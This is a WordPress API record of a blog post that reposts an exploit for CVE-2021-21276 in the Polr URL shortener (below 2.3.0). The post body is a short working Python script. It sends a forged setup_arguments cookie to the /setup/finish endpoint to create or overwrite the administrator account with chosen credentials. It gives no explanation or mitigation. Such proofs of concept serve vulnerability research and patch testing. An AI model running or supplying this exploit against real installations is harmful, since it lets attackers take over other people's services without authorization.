{"id":40026,"date":"2023-04-06T22:09:02","date_gmt":"2023-04-06T18:09:02","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/171743\/polrurl230-takeover.txt"},"modified":"2023-04-08T10:35:55","modified_gmt":"2023-04-08T06:05:55","slug":"polr-url-2-3-0-shortener-admin-takeover","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/polr-url-2-3-0-shortener-admin-takeover\/","title":{"rendered":"POLR URL 2.3.0 Shortener Admin Takeover"},"content":{"rendered":"<pre><code># Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover\r\n# Date: 2021-02-01\r\n# Exploit Author: p4kl0nc4t &lt;me-at-lcat-dot-dev&gt;\r\n# Vendor Homepage: -\r\n# Software Link: https:\/\/github.com\/cydrobolt\/polr\r\n# Version: &lt; 2.3.0\r\n# Tested on: Linux\r\n# CVE : CVE-2021-21276<\/code><\/pre>\n<p>import json<\/p>\n<pre><code><\/code><\/pre>\n<p>import requests<\/p>\n<pre><code><\/code><\/pre>\n<p>payload = {<br \/>\n&#8216;acct_username&#8217;: &#8216;admin&#8217;,<br \/>\n&#8216;acct_password&#8217;: &#8216;password&#8217;,<br \/>\n&#8216;acct_email&#8217;: &#8217;email@youremail.com&#8217;,<br \/>\n&#8216;setup_auth_key&#8217;: True,<br \/>\n}<\/p>\n<pre><code><\/code><\/pre>\n<p>r = requests.get(&#8216;http:\/\/localhost\/setup\/finish&#8217;,<br \/>\ncookies={&#8216;setup_arguments&#8217;: json.dumps(payload)})<br \/>\nprint(r.text)<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: POLR URL 2.3.0 &#8211; Shortener Admin Takeover # Date: 2021-02-01 # Exploit Author: p4kl0nc4t &lt;me-at-lcat-dot-dev&gt; # Vendor Homepage: &#8211; # Software Link: https:\/\/github.com\/cydrobolt\/polr # Version: &lt; 2.3.0 # Tested on: Linux # CVE : CVE-2021-21276 import json import requests payload = { &#8216;acct_username&#8217;: &#8216;admin&#8217;, &#8216;acct_password&#8217;: &#8216;password&#8217;, &#8216;acct_email&#8217;: &#8217;email@youremail.com&#8217;, &#8216;setup_auth_key&#8217;: True, } r &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-40026","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=40026"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026\/revisions"}],"predecessor-version":[{"id":40059,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/40026\/revisions\/40059"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=40026"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=40026"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=40026"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}